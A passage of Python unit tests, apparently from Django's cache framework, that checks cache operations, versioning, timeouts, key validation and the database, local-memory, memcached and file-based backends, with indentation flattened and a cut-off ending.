self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnoreDeprecationWarningsMixin, TestCase):
def test_simple(self):
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
# Ensure that we don't close the global cache instances.
signals.request_finished.disconnect(close_caches)
try:
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
finally:
signals.request_finished.connect(close_caches)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
